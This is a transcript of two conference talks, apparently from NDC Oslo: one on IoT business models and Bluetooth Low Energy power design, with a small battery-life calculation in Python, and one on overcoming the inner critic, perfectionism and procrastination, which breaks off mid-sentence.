I to see that this was going to make $100 million in four years, or that our revenue was going to be so much? Sure: you give me six salespeople, we could make like $2 million, $3 million, $4 million. A sales guy can knock on ten doors a week, do follow-ups, close maybe 35 customers. Yeah, maybe we can think up some numbers like that. But really, it was something we just plucked out of thin air.
But the tools have changed. What we see now is the Business Model Canvas. Understanding how to do a business model is key. A lot of these things are happening, but to really tame them, to really get control over the stuff, you need to spend time with your business model. So things are changing. The semiconductor industry is changing. But you're not in the semiconductor industry; that's really the bottom piece of the pyramid. We can tell you that this is going to change. We can see insights in the market. But for you to take advantage of that and leverage it, you need to spend some time on the how. So for example, Nest is not just selling the thermostat. It's not like selling an iPhone; the iPhone changes every year. Of course, the guy who designed the Nest thermostat was an ex-Apple employee who had designed the iPod. But he came to the realization that a thermostat is not going to be replaced every year. Nobody's going to change their thermostat every year. That doesn't make any sense. So it's clear that they needed to think of different business models by which they could continue to bring in revenue. Winning or losing, being successful, is basically about ensuring that you serve people. That's it. The whole point is to serve people. Nothing else. We don't matter. I don't matter. If I'm going to be with a customer, if one of you guys is going to use our chips, we are nobody. We're there to serve you. That's very fundamental. So we've got to figure out: how can we serve these people better? What are the better defaults for them? What intelligence can we get into the apps? In any case, you need to look at the business model. And for the Business Model Canvas, there are a lot of people in Oslo and in different cities who can help you with that. The startup world is quite aware of it. So it's key activities, value propositions, and how does this value proposition get to the customer? So if you look at Nest, who is the customer?
The customer is the guy who buys your stuff. Yeah, that's one way to look at it. Is the customer the utility company? Maybe. Interestingly, look at Posten in Norway: Posten is a service run by the sovereign, which is interesting. So who are the customers for Posten? Are you the customer of Posten? Or is the guy who stuffs all the junk mail inside the postbox the customer? Who's the customer? Who pays the money? Is he the customer? So look at the US Postal Service. There was a startup that said: okay, you know what, you guys are receiving too much junk mail, so we're going to take control of that. Of course, in Norway there are ways by which you can say "ingen reklame", no advertising, and you can even tell the free newspapers that you don't want them delivered. That's possible. In the US it's a little bit of a wild west over there. So this startup basically said: hey, you're receiving a lot of junk mail and you can't even find your real mail inside the junk mail. So let's do this: we will take it from your postbox, look through it, throw away all the junk mail, scan whatever is there as real mail, and send it to you digitally. So they ran a business where they would drive trucks to postboxes, open them up, and do exactly that. But the US Postal Service said: that's not going to work, you've got to stop it. Because look, you know who the customers of the US Postal Service are? It's not the guy who's receiving the mail. It's actually the guys who are sending all the junk mail. Go figure. But that's what a business model will tell you. It'll tell you who you're going to serve. So for some of these things, you need to understand how they're going to work. But remember, win-win is good. A thermostat sitting as an intermediary between energy companies and you, so that you save money and the energy companies save money too, is a good thing. But it's up to you. These tools did not exist when I was doing a startup.
So today we have lean startup thinking, and we have the Business Model Canvas. Another thing we clearly see as a strong one is the customer development process, and of course the minimum viable product. The value proposition is not something you build in isolation. The value proposition is about solving a customer problem or need. It really consists of three components. The easy one for most entrepreneurs to talk about is what product features you have or what services you're providing. But there are actually two more important components to a value proposition: what gain are you creating for customers, and what pain are you solving for them? Alexander Osterwalder, who created the Business Model Canvas, really emphasized this. It's not just about your product, and especially if you come from a technical background, it's really easy to say: oh, look at all these features. If you find yourself doing that, you need to complete the sentence and say: yes, but here's what we make people able to do better, and here are the problems we solve for them. So the real goal of figuring out the value proposition is understanding what we call the minimum viable product. You're trying to figure out: now that I kind of understand my product and service, and the gain I'm creating for customers and the pain I'm solving, what's the smallest possible feature set I could be shipping on day one that solves these pains and creates these gains for them? And this really is an iterative process, because there's no way, no possible way, sitting in your office, that you could figure this out. The default for great engineers and great entrepreneurs is: oh, I understand customers' problems and needs, so don't worry about it, we'll just spec the entire product on day one. Your real goal here is to figure out the smallest thing you could build and develop that actually gets you users or sales or whatever, and to get out to the market as quickly as possible.
And so the goal of getting out of the building for the value proposition is understanding gains and pains, so you can figure out the MVP, the minimum viable product. This did not exist when we were doing startups earlier. So the insight that Steve had, from running eight startups and being able to teach other people about it, is very valuable. In the same way, the market trends we see would not make any sense to you unless you understand that to grab the opportunity, you need to understand some of these things. The opportunity is there, but you need to understand it. The next thing we had was Arduino. Arduino really changed the game with respect to hardware prototyping. As I told you, I worked in the industry when the mobile phones were really Palm OS, Palm Pre, Pocket PC, and Windows Mobile. When we were creating hardware to work with those devices, nothing had standard hardware. We had to really create everything from scratch. A huge amount of engineering resources. And startups usually don't have that. So prototyping, fast prototyping, lean methods of development: these are insights which we have gained. Some of our partners have actually gone ahead and created things like these. This was not possible before, and now it is perfectly possible to go ahead and quickly do prototyping. So if you want to build things which change this stuff, you can actually go ahead and do things like that. So, quickly, about Bluetooth Low Energy. Power efficiency is something you're going to have to work at. It's not a matter of: I put the chip in, I put some code inside it, and it just works. You need to understand a little bit more about power efficiency. You've got to spend some time measuring it, trying to understand what's happening over there. But the typical pattern is: run quickly, do whatever you're going to do quickly, and go to sleep.
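The "run quickly, then sleep" pattern can be quantified with a simple weighted average of active and sleep current. This is a back-of-the-envelope sketch; the figures in the example are made up for illustration, not taken from any datasheet.

```python
def average_current_ma(active_ma: float, active_ms: float,
                       sleep_ma: float, period_ms: float) -> float:
    """Average current of a duty-cycled device: one short active burst
    every `period_ms`, sleeping the rest of the time."""
    sleep_ms = period_ms - active_ms
    return (active_ma * active_ms + sleep_ma * sleep_ms) / period_ms


def battery_life_hours(capacity_mah: float, avg_ma: float) -> float:
    """Idealized battery life (ignores self-discharge and peak-current limits)."""
    return capacity_mah / avg_ma


# Illustrative figures: 10 mA while the radio is on, for 3 ms out of every
# second; 2 microamps asleep; powered from a ~220 mAh coin cell.
avg = average_current_ma(10.0, 3.0, 0.002, 1000.0)   # about 0.032 mA
life = battery_life_hours(220.0, avg)                # months, not days
```

The takeaway is why the duty cycle dominates: the device spends 99.7% of its time asleep, so the tiny sleep current, not the radio burst, sets the battery life.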
Meaning, we're not going to be running like a PC all the time. Internet access, internet connectivity, must also work together with this. If your server wants to talk to the device, it needs to wait until the device wakes up and talks to the server. When the device has woken up, the server can say: hey, by the way, I've got a whole bunch of other things for you to do, and you can do all of this in one shot. So processing cannot work as: okay, whenever you want me to do something, I'm going to be awake. It's not going to work like that. The opportunity today requires you to be power-aware to some extent. If you look at Bluetooth Low Energy, the gaps in between over here are where you sleep. This is when the radio runs and talks to your internet, and you try to sleep as much as possible. And the tools allow you to do that. So you've got to prototype. You've got to learn. You've got to play. If you play with these things, you learn about these things. If you're keen on doing something about it, go ahead and play with it. And we give you toolkits to work with, how-tos, and help to go through it. We have the pieces for you to play with. But remember, what we are really saying is: the insights are there, the trends are there, but unless there is somebody to go and seize the opportunity, it's not going to amount to anything. We're there to help you and to serve you, to really say: hey, take advantage of this time. These are exciting times. A simple thing about Bluetooth Smart: any data that you send is typed data. So if you're going to send data, you have to say whether it's a uint or a float, or temperature sensor data, or glucose meter data, or anything like that. So when it goes to your server on your internet back end, it's going to be typed. You already know what it is. It's coming with that bit of context. So you can grab multiple contexts together.
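As a sketch of what "typed data with context" means once it reaches the back end, here is a toy server-side merge. The dict-based reading format is invented for illustration; in real Bluetooth Smart, values are identified by GATT characteristic UUIDs, which is what makes the typing possible.

```python
from datetime import datetime, timezone


def merge_context(readings: list) -> dict:
    """Fold a batch of typed readings from one wake-up burst into a
    single contextual record. Because each value arrives already typed,
    the server can combine them without guessing what the bytes mean."""
    record = {"received_at": datetime.now(timezone.utc).isoformat()}
    for r in readings:
        record[r["type"]] = r["value"]  # the type tag says what the value is
    return record


# One burst from a device: temperature and a position hint land together,
# stamped with the time they arrived, as one piece of context.
ctx = merge_context([
    {"type": "temperature_c", "value": 21.5},
    {"type": "location", "value": (59.91, 10.75)},  # illustrative coordinates
])
```

This is the "grab temperature, location, and time together" point from the talk: because every reading carries its type, the server can merge a whole burst into one record trivially.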
You can grab temperature. You can grab location. You can grab time. They all come to you at the server as contextual data, so you can put all of it together easily. The lowest-power approach on these things is, of course, sending asynchronous data. That means you don't want application-level acknowledgments and constant pinging back and forth; the radio itself provides you acknowledgement and reliable links. These are reliable links already. And obviously, you want the lowest time on air for low-power performance. So the key thing: the opportunity today really means you need to understand a little bit about the hardware to do low-power design. To understand a little bit more about the hardware, we give you the Arduino tools to play with it. You truly can tame the beast. And when you tame it, you'll know what to name it. The Internet of Things is not really about the thing itself. A learning thermostat is an internet thing, but it's a learning thermostat because we as human beings could never figure out how to set a thermostat to save power or money, and the Nest had to do it for us. So the intelligence really lies over there. Better defaults, intelligent devices, and we're not going to ask the human the question. We have some code; you can look at our GitHub pages. And we are there to help you guys. We have a DevZone portal: ask questions, freewheeling questions, no problem. Carpe diem: seize the moment. All right. If you have any questions, you can ask me; otherwise I'm done. Okay. Thank you very much.
We have heard about IoT for years and years; some even claim to have seen it, very few claim to have tamed it, and even fewer actually do. Interestingly, those who do tame it claim it to be a different beast altogether. Today it is easy to add a Bluetooth Smart wireless IC/chip to your physical product and write an app or website for it. Is this not IoT? Get an insight into what has worked in IoT. How does Bluetooth Smart change the rules for IoT? Learn to quickly prototype your IoT.
10.5446/50591 (DOI)
See, I love it, yeah. So I want to talk about banishing your inner critic. I am actually a former front-end developer and web designer turned creativity consultant, or as I like to call it, creativity evangelist. A lot of the stuff I talk about with helping people get creatively unblocked has to do with my own process and my own demons that I've wrestled with, or that I continue to wrestle with, and I figured if I've got them, I can't be the only person who has them. And a lot of people, after I talk about this stuff, are just like: get out of my head. So let's talk about how to get rid of your inner critic. If you're going to tweet stuff, that's totally fine with me. I won't be mad at you for it. My Twitter handle is denisejacobs. Nice and easy to remember. You know we're at NDC Oslo, and you can use banish your critic as the hashtag if you want to hashtag it. So, oh, hi. Like I said, I'm a creativity evangelist, and because the tech world is my wheelhouse, I tend to do creativity consulting and workshops at companies and corporations, and obviously at conferences all over the place. So if you guys actually like what I'm talking about, I can come and talk to your company and it'll be cool. But let me tell you a story to get this all put into perspective. Let me tell you a story. Like I said, this has to do with my own demons, so I have a little story from my own life to tell you. Basically, once upon a time in 2009, I got a contract to write my book, The CSS Detective Guide, and I was so excited about it. I was so psyched, and I set it up in my schedule, and June 29th was the day. It was the day I was going to start.
Unfortunately, instead of having it be this process where I started really delving into my creativity and showing my front-end development CSS chops and everything, what I ended up practicing instead, at least for those first two days, was destructivity, which is like creativity's evil twin, right? What ended up happening was I had these voices in my head, and they were like monsters. They were merciless, and they were just telling me all of these horrible things. And I totally, totally freaked out. And when I say I totally freaked out, I mean that for the first two days I was completely useless. I spent some of the time on the first day reaching out to this women's technical networking group I had been a part of in Seattle, Washington, called Digital Eve. I sent an email and I was like: oh my God, I'm freaking out, I feel like I'm not good enough, and all this stuff. The highlights from the email are here. I shouldn't be writing this. I misrepresented myself. This should be somebody else's book. I'm going to look stupid and people are going to see I'm a fake. What if the book isn't good enough, and what if I'm not good enough? All of these things were going through my head. As a matter of fact, the first two days I was supposed to be working on the book, I wasn't even supposed to be writing; it was just going to be research, and I've done research forever and a day. Instead, I spent those two days crying. And when I say I was crying, I'm not talking about a little boohoo. I mean I was on the couch, and I'd get myself together, okay, all right, all right, and then lose it again. I was a mess. I was such a mess. And even when I got myself together after those two days, it didn't stop there. Those voices still pushed me into really bad behavior.
I worked myself nonstop on this book for eight or nine months. I was like a workhorse, basically, and I pushed myself to burnout. The last six weeks of that book I did as one continuous all-nighter. And when I say an all-nighter, I mean I was awake until I couldn't stay awake anymore, then I slept for a few hours, two, three, four hours, then got up and rinse, repeat, did it again. I did that for six weeks. You don't know the toll it takes on your body to not sleep enough for six weeks. It's crazy. So like I said, these critical internal voices basically pushed me to a point where I was always anxious, a little depressed, and completely stressed all the time. Now, you're all probably familiar with the physical manifestations of fear, right? Some people get sweaty palms; I'm not of that variety. Some people get sweaty pits. Sometimes your heart starts pumping. Sometimes your stomach goes into a knot, right? But there's a different kind of fear, which was what I was experiencing, which was all of my internalized criticisms, right? All of these voices, like I was saying. And that basically translates into your inner critic. The inner critic I liken to the troll under the bridge of your subconscious, right? It's there, and you've got your regular thoughts crossing the bridge and going out into the world, and then you've got this troll, every now and then. And fear, I don't know if you've heard this acronym before, but in English, fear is often said to stand for false evidence appearing real. But then there's another one, which is what usually happens when you're actually feeling fear: fuck everything and run. I'm out of here, right?
Now for me as a creativity evangelist, as somebody who's very concerned with the whole creative process and wanting to put new things out into the world, fear is particularly bad, because it is the enemy of creativity, right? If you're experiencing fear, you cannot be creative. And I'm not saying that as a theoretical construct. There is neurological evidence that when your brain is processing fear, your brain waves are actually different. If you're not familiar with brain waves: beta is kind of normal concentration and focus; alpha is when you're more relaxed, like when you're about to fall asleep, and often where people are most creative; and gamma is a really, really high frequency, which usually happens when you're in a crisis mode, sometimes when you're having an aha moment, but usually in a dangerous place. So when you're constantly stressed and in fear, you're actually somewhere between beta and gamma, and it's not a good place, right? Stress and frustration effectively suppress the generative impulses in your brain that are the underpinnings of creative thought and creative thinking. So when you're in fear, your creative expression is dampened, and you can't let all of those great ideas rolling around in your head actually get out into the world. So in order for us to be more creative and to move forward that way, we need ways to identify the inner critic. I'm going to give you some pointers and some ways to not only identify your inner critic, but also, as you probably gleaned from the name of the presentation, ways to actually get rid of your inner critic, or at least to silence it a bit.
So this sort of thing is probably really familiar, right? You know: your brother was more successful than you are; I never thought you were going to make it; you're not good enough; you're not smart enough; you should have finished that MBA; etc., etc., right? Not that hard to recognize those kinds of things, but there are other ways your inner critic will show up as well. Like if you find yourself being extremely busy all the time. And I understand that here in Europe this doesn't happen as much as it typically does in the United States, but I do think that in modern Western society we're bound to fall into this in one way, shape, or form. So if you find yourself just being extraordinarily busy all the time, but not really able to produce that much, always busy but not producing, that's probably your inner critic running the show in the background. If you find yourself comparing yourself to others, saying, oh my God, I should have done this by now, and I ought to do this, and I must do this, then you've probably got some inner critic stuff popping up. If you have a fear that somebody is going to find out at any moment that you really shouldn't be doing what you're doing, and that you don't know what the hell you're doing, then most likely that's your inner critic, and that is actually known as imposter syndrome, right? So if you feel like you just got lucky, you're not really that good at it, you just got a break and you're kind of doing this thing without really knowing what's happening, and oh my God, if somebody finds out that I don't know anything, they're totally going to fire me, or I'm going to get run out of town on a rail, then you're probably experiencing imposter syndrome. Another form of that is: I just don't know enough.
I have a lot of people who say: well, you know, I think I would like to speak at conferences, but I just don't think I know enough. And I'm like: you know plenty, go out there and do it. Well, I don't know, I don't know. Inner critic. Now, there is such a thing as the opposite of imposter syndrome, and that is the Dunning-Kruger effect. You know there are people who have a much higher sense of their competency than is actually warranted, who are just like: dude, I killed that, I totally nailed it. And you're like: you know absolutely nothing, I don't even know how you are two levels higher than me in this job, it's crazy. So there is something called the Dunning-Kruger effect, but most likely, if you're feeling like you're a fake and you're going to get found out, you're not experiencing Dunning-Kruger; you're experiencing imposter syndrome. The interesting thing about imposter syndrome is that there's something I like to call the imposter syndrome paradox, and it's this: if you're experiencing imposter syndrome, that actually means, ironically enough, that you are uniquely qualified to do the very thing you're afraid you'll be found out as a fake at. So if you're experiencing imposter syndrome, take heart and know that it actually means you're okay, you can do it, you can kick butt, and you can use that to move forward. Another form the inner critic shows up in is perfectionism. It's got to be perfect, it's got to be flawless. I'm just going to do this one little thing first; okay, well, I'm going to do this other little thing before I commit it; I'm going to do this other thing. If you have that, and the next thing you know it takes longer and longer and longer to finish, you've got some perfectionist tendencies going on. Perfectionism's twin brother is procrastination.
So if you're like: I'll do it tomorrow. And then: no, okay, I said I was going to do it today, but I'm not, I'll totally do it tomorrow. And then: no, no, no, really, tomorrow is the day, I'm totally going to do it. If you're doing a lot of procrastination, you've also got some inner critic stuff going on. The interesting thing a lot of people don't know is that perfectionism and procrastination actually feed each other, and I like to think of it as this kind of infinite loop where they feed each other back and forth. When you want something to be so perfect, you will sometimes push it off, because it seems so grand and so big in your brain that you'll push it off and push it off. I just need to do some more research, I just need to pick up this one more thing, I just need to... and the next thing you know, you've done it late, and you may have missed an opportunity because of it. Now, the thing is that perfectionism is toxic, and procrastination is very damaging. And like I said before, particularly for creativity: in order for us to get unblocked and allow creativity to flow, we need to do some different things. One of those things comes from this really great quote I found, which says that the goal for us as workers, as tech workers, as people who are inherently creative... and by the way, FYI, I am of the mind that developers are creative. Who here feels like they actually are creative? Give me a show of hands. Yeah? Great. Okay. For the people who didn't raise a hand: it's my belief that developers and technical people are some of the most creative people on the planet. There are very few folks you can tell: you know what, I want to do this, and they say: okay, I'll just build it. Think about that for a moment. Just because you're logical and analytical and technical doesn't mean that you're not also creative.
So those of you who didn't raise your hands, take that and chew on it while I'm talking. Anyway, this quote I love: the goal for us as creatives, as tech people, as people producing stuff that goes out into the world and touches a lot of lives, is to manage our anxiety so that our energies are used for the productive and satisfying art of creating, and not the destructive and debilitating art of self-torture, which is what the inner critic does, right? So this begs the question: how do we banish our inner critic? The first recommendation is to eliminate should, ought, must, and have to from your vocabulary. I love this picture on Flickr, and I love that it says: choose what you want to do, choose what needs to be done. A lot of times what ends up happening is we have this sense of internal pressure that is actually fake, right? I should be doing this. I must do this. I have to do this. You don't have to do anything. Really. Very few things actually have to be done, and should is a really bad word. So if you catch yourself operating on those, let that be an indicator to stop and check yourself, and start thinking: okay, what absolutely needs to be done? What is actually going to move me forward? And do that instead. Another one is to say no to comparisons. Like the apples and oranges picture from before, right? A lot of times when you compare yourself to other people, you are comparing yourself to a perception that is often incorrect. There is a saying, I don't know if you've heard it, that you cannot compare your insides to somebody else's outsides, right? You look at somebody, you look at what other people are doing, and you have no idea what their backstory is. You know all of your own backstory, but you don't know anybody else's.
So the best thing to do is to compare yourself to yourself, and use that as an impetus to move forward for yourself, not based on anybody else. Another thing you can do with your inner critic is actually ask it questions. You can engage it. The inner critic is basically an internalization, like I said, of all the criticisms you've experienced over the course of your life, most likely from your childhood: your parents criticizing you, teachers, peers, what have you. You internalize all of that, and then it's there as a protective mechanism. However, sometimes it's like when people have autoimmune disorders and the body starts attacking itself. The inner critic can be like that, right? It's working a little too well, and sometimes it actually makes you stagnant and keeps you from moving forward. So you can engage with your inner critic, with that internalized amalgamation of all the critics from your early life. You can say: where do you come from? What do you want? What's your point, basically? If you get some criticism, like, well, you know you shouldn't have blah, blah, blah, you can be like: you know what? Not helpful right now. Come back later when I need some criticism. You can dismiss it, and you can keep doing that. If any of you have practiced mindfulness or meditation, you know there's a thing called the monkey mind, right? When you're trying to sit and be still, and your thoughts keep jumping around, you can always say: thank you, thank you, not now. Not now. And you can do the same thing with your inner critic. In addition to saying not now and pushing it off, you can also be compassionate with your inner critic: thank you so much for trying to protect me, but I actually don't need it right now.
And you can actually use that to your advantage. One of the last things I want to say for this section is that you can reassign duty. The inner critic is actually really helpful at times when you genuinely need criticism. But when you're writing, or creating something, or sketching out ideas, you don't need some critic in the background going: you missed this; well, you shouldn't do that; well, that's going to be stupid; that's not going to work. You don't need that. What you need is this: once you have all of the ideas and you need to start vetting them, then you need a critic. So you can reason with your critic and say: thank you, come back when I need to vet this stuff. I don't need you right now, but in a little bit, when I'm vetting, that's when I'll want your help. Another thing you can do is remember your successes. A lot of times for me, for example, when I'm trying to work on something, like if I have to write an article, and all of a sudden I start freaking out about writing an article, as if I haven't written a whole book before, right? A lot of times I will actually gather things around me that either inspire me or that I've made, and I'll be like: okay, I did write the book, great. I did make this, I did make that. I make stuff, I write stuff. It's okay, I can do this thing that's in front of me. And sometimes that helps me move forward. And then another thing you can do is just maintain perspective. Like I said, if you're asking it questions, what's your point, what do you want, who are you, you can also say: so what? Don't even care. It's back there chattering away, and you can just be like: whatever, don't even care. Now, here's a great little exercise I want you guys to do. You guys have enough room? I feel so bad, the pitch is so steep, I feel like if you stand up you're going to, woo, fall over.
But you guys, can you stand up? All right. So Amy Cuddy did a TED talk talking about how your brain and your body work together and that if you actually change your physical stance, you can actually change the way your brain is working. So this is something she calls a power pose. Now a lot of times, especially when you're feeling kind of down on yourself, your inner critic is like up in arms and like, you know, it's full regalia, you know, telling you a long litany of all the things that are wrong with you. You can counter it by changing your body position. So if you kind of, this is, you guys ready? Okay. So I want you to get in your most slumped over. I can't do it. I totally suck. Oh my God, it's horrible. When are you ever going to get a real job, do something with your life? Okay. Now, shake it off. Now I want you to adopt your favorite superhero pose. You can stand with your hands on your, yeah! All right. Woo! You can fly through the air. Yes, my favorite one. It's looking off in the distance. All right. Let's try it. Shake it off. Okay. One more time. Get into it. Oh, it's a horrible thing. All the things I can't believe you did a done. Why, why, your sister, your brother's so much better. No, they're not making up money. Okay. Woo! Shake it off. Ready? Hit it. Hit it. All right. So, if you hold, thank you very much. You can sit down. If you hold that position for 15 to 30 seconds, it is actually, studies have shown that it will actually change your neurobiology. It will change your neurochemistry. It will change what your brain is thinking and it will help you get into a more empowered place. So, do that. Now, here is my favorite part of the presentation. I just finished writing an article called Breaking the Perfectionism Procrastination Infinite Loop, which is on the Web Standard Sherpa website. You guys, I'll have the URL later on. 
But in particular, what I'm particularly afflicted with is the perfectionism procrastination infinite loop, which is why I wrote the article. And incidentally, ironically enough, I have to tell you guys because I laugh about it now, I was two weeks late on the article. I said I was going to give it to them on the 26th of March. I gave it to her sometime in April. Number one. Number two, the article was supposed to be 750 to 1,000 words long. Guess how long the article is? Guess. Somebody guess. Yup. 2,500 words. Good call. What? That's crazy. I'm writing this stuff because I need it too, right? So, in terms of perfectionism, like I said, perfectionism is very toxic. And you may have heard this quote, that perfectionism is self-abuse of the highest order. Now, what happens is that we've got this beautiful, perfect, wonderful picture in our heads, and then we're trying to achieve this beautiful, wonderful picture instead of realizing that everything kind of needs a start of some sort, right? So we spend all this time putting all this extra time into stuff unnecessarily. So perfectionists also basically will focus on the finished product, right, instead of focusing on the process. Interestingly enough, there was a study done where they took two groups and they put them in a pottery studio and they said, okay, group number one, I want you guys to build the perfect pot. Throw me the perfect pot. Group number two, they said, I want you guys to throw as many pots as possible. Guess which group threw the better pots? The many, right? Because they didn't care. They were like, zhup, zhup, zhup, zhup, zhup, zhup, and the more they did it, the more practice they got and the better the pots got. The ones that were trying to do the best pot were getting frustrated, were knocking themselves out, killing themselves to try to attain this perfect standard and they never made it, right? So think about that when you're doing something.
Do you want to like get the practice? Do you want to get better by getting the practice or you want to get better by just doing it perfect out of the gate, which doesn't exist, right? What ends up also happening is that perfectionists and perfectionist procrastinators are successful in spite of their perfectionism, not because of it. So also keep that in mind. So some ways to start combating perfectionism. Sometimes perfectionists are perfectionists because we are seeking approval from other people. But what you really find out and what you, when you have like a moment of clarity is remember that people are really into themselves, right? They pay attention to you for like a hot second and then they're off somewhere else, right? They're like, oh yeah, so let's really great about you talking about me. They're like, let's talk about me. So remember that people are very egocentric. Pretty much no one really cares that much and no one else really matters. So try to really focus on just doing stuff for yourself. Great quote by Maya Angelou who just passed away last week, which is, you're enough and you have nothing to prove to anybody. Another way to, another little kind of mind shift that you can do to kind of help this perfectionist streak that you may have is to decouple your performance from who you are, right? Most people who are perfectionists, myself included, think if I don't do this amazingly then I'm a failure, right? Then I'm not a good person. But my performance on doing stuff doesn't really change whether I'm a good person or not, right? I'm a good person because I'm kind or I pick up garbage or whatever, right? It's not because I do something absolutely perfect every time. A lot of times perfectionism has to do with this fear of failure as well. And there's a great quote from a movie After Earth and I actually missed. So this is great. As a perfectionist I look at the slide and go, oh my God, it's totally messed up. 
Like, you know, if I hadn't told you guys, you wouldn't have noticed. It's one of those things. Just sharing my process with you. So, great quote from the movie After Earth, which is: fear is not real. It is a product of the thoughts that you create. Danger is real, but fear is a choice, right? So whenever you're having those moments where you're like, I gotta do it perfectly and I gotta do this and if I don't do it then everybody's gonna say it's gonna be horrible and blah, think about the fact that this is actually just a habit pattern that your brain is going through and that you can choose to stop it at any moment. And you can say, actually, that's not true. Let's just focus on doing this thing and do it. Another suggestion for dealing with failure is actually reframing failure, and also kind of reframing mistakes and potentially, potentially even embracing them. Great quote is that failure is only the opportunity to begin again more intelligently. So when you fail at something, you actually get the chance to learn from it. You get to learn from it and you get to make it better. And you also have to remember that most things that are really successful had extremely humble beginnings. This is the webpage for Twitter. The very, very first, listen, I got it off the web, I couldn't make this up. This is the very first homepage for Twitter when it very first launched and it's crazy. If you read it, it's just got horrible text speak in it and everything. They were just doing their own thing, bless their hearts. But they figured it out and they got it better and now you either love it or you hate it. Obviously, they're successful to some degree with what they've done. Another thing that you can do to kind of help reframe failure is to copy the masters of fail, and that's children. Children are amazing at failing and learning from it and having complete and utter resiliency. So, kids. How many of you guys are parents in here? Yeah? Great.
So you know that when your babies took their first steps, they took their first step and fell down and then they got up completely unfazed. Like they didn't even know that they're supposed to be embarrassed or upset about it. They just fell and then, whoops, and then they got right back up and you were just cheering them the whole time. You didn't care that they fell. That's what babies do, babies fall. We fall when we're trying something new. That's what we do, right? So take your steps, fall if you want to, practice it in private. Practice it in private first so that you get that whole process down and then try again and keep stepping. Another practice for you that I think is really, really important and really a great way to frame this is something called satisficing. Are you guys familiar with the term satisficing? Okay, so satisficing comes from doing something satisfactorily and letting it suffice. So satisfactory and suffice together make satisfice. So basically it is doing it to the point that is needed and then letting it go. Another way I like to think about it is, you guys have heard of Pareto's principle, the 80/20? So in business they say 20% of your customers are giving you 80% of your business, right? You could effectively let go of the other 80% of your customers and you would still be successful, because it's really that 20%. So I like to think of it this way. I kind of think of it as an inverse Pareto's: you put in 80% of your 100% effort, because your 100% effort is probably a bar that's so high that you can't even see it, practically. It's like a sky-high bar, because when perfectionists have standards, they have extremely high standards, right? So take your high standard and instead of trying to reach the ultimate of it, the 100%, go for 80% of it. Your 80% with your high standards is probably the equivalent of somebody else's 150%. Especially to the people that are going to be evaluating you, right?
So go for that 80% because that extra 20% is going to be not sleeping, stress, like just totally like letting go of your sanity to try to get that extra 20% and it's not worth it. Another thing that you can do that I personally really like is to make it bad and make it ugly, right? Sometimes when you're a perfectionist you won't start on stuff, this is the procrastination part of it, you won't start on something because you just want it to be so good. But that just takes a long time. Sometimes if you just give yourself permission for it to be bad, you will get started and then you can take that and you can iterate on it. So one of my favorite things that I did when I was writing my book, when I would have these like, oh my God, this chapter needs to be really good, I'd be like, okay, you know what, I'm not getting anywhere. I'm going to write a really bad sentence and then I'm going to write another really bad sentence and another one and this paragraph is going to suck and this chapter is going to suck. But you know what, I wrote it and then I could work with it and I could edit it and sometimes it didn't actually suck, I just needed something to move me forward. So make it bad and make it ugly. Remember with perfectionism and trying to be right is that being right keeps us in place and being wrong forces us to explore. And then finally with this perfectionism thing, remember that there is a difference between perfectionism and excellence, right? There's a difference between something being perfect and something being excellent. You can have something be high quality and great, but it doesn't mean that it has to be perfect. Okay, finally, with this whole procrastination business. So like I said, the perfectionism leads into the procrastination, they go back and forth. So let's talk about the procrastination aspect of things. I don't know if you guys have seen the field guide, the procrastinator's field guide. It's totally, you have to look it up. 
It's really, really funny. There's like 12 different kinds of procrastinators. Are you a napper or are you a panicker? Are you a list maker? So if you're in procrastination mode, you'll probably be like, oh yeah, I'm totally going to look that up right now, right? But the trick is actually not determining what kind of procrastinator you are, nor is it like administering a dose of fuck it all. Like, fuck it all, I'm not going to do anything, right? It is really about kind of understanding what's going on when you procrastinate. Procrastination actually is not laziness. A lot of people confuse it with laziness. It's really actually a misguided sense of activity based on kind of a lack of clarity and also a really low tolerance for frustration and failure. So when you're procrastinating, know that a lot of times it's because of that, and it's also because potentially the thing that you're supposed to be doing doesn't have enough value for you. You can't see it in the context of a big picture. So you're like, oh god, I have to do this thing. So one of the first things that you can do to deal with procrastination is to increase the meaning and value of the task. If you know where this task fits in the grand scale of your goals, right, and how it's going to move you forward, you will be way more incentivized to actually accomplish it and to achieve it and to get to it. Another thing you can do is to do a few mind tricks. And I really love this. So some of my favorite mind tricks to do with procrastination have to do with getting ready to do something instead of actually doing it. Setting everything up. Okay, I got all my stuff for writing. Okay, I did all the research, I got all the research ready. Okay, I got this. Okay, I got that. I'm not really doing it. I'm just getting everything ready in place before I do it. But guess what happens when you get everything ready to do something? What are you doing? You're doing it, right?
You actually do. Because the process of getting ready for it actually gets you excited, right? So you're like, oh, wow, okay, I got this, I got this. Maybe I'll just, I'll just, and then you're like, I'll just write a sentence. I'll just write a couple lines of code. No problem. I'll just sketch it out. I'm just going to sketch it out to get ready to do the stuff. And if that works for you, do it, because it will actually get you out of the "yeah, you know, I'll do it, I'll do it later, I got time" mode. No, just start getting ready to do it. Another trick, and I found this when I was doing my research, is something called structured procrastination. Has anybody heard of this? Great. Like, everybody's like, no. So, structured procrastination is actually another weird little thing that you can play with yourself, which is to have three really high priority things, for example, and have them all on your list. And then you're like, I'm not going to do the first thing, but I'm going to do the second thing. Or I'm not going to do the first and second thing, I'm going to do the third thing. They're all really high priority, really important things to do. So you may be procrastinating on the first thing, that's the top priority, but you're still getting other things that are important done. The trick with structured procrastination is not to confuse it with actual procrastination, which is: I'm going to organize all of my screws. That is not part of structured procrastination. That's probably not as important as finishing the app that you are trying to build, or trying to find funding, or getting a new job, or whatever it is. I've got some time and space tricks that I want to share with you. The first one is... I'm sorry, I love this video so much. You guys should totally watch this. It's called Shit Black Girls Say, and it is one of the funniest things I've ever seen. And so you have to watch it, and it goes, delete.
So one of the first things that you have to do is eliminate distractions and start deleting things. I just did a workshop yesterday called Hacking the Creative Brain, which you all missed, except for Michael here, they all missed, and it was awesome. But one of the things that I have my students do in this workshop is to make what I call a to-don't list. And that is to make a list of things that you are going to commit to not do anymore. You're either going to delegate them, you're going to dismiss them, or you're going to drop them. And so eliminating distractions, eliminating things is really important. Scott Hanselman has this great talk, he's going to be doing it, I think, tomorrow about the scaling yourself. And one of the things that he says in it is, it's not what you read, it's what you ignore. Right? So a lot of times you have to be very deliberate about what you're going to ignore. You can't look at everything. You can't read every email. You can't read every awesome blog post. You can't go and look at all the news on all the sites. You have to actually deliberately make a choice to ignore stuff. So that can be part of helping your procrastination as well. In terms of actually blocking yourself from going to destructive websites, and I have this problem, I have this weird Facebook tick where it's like I'll be doing something and I'll be like, oh, let me just see what's on Facebook. Like, for no reason. I didn't even like Facebook. I still actually don't like Facebook. And I didn't go on Facebook for like the 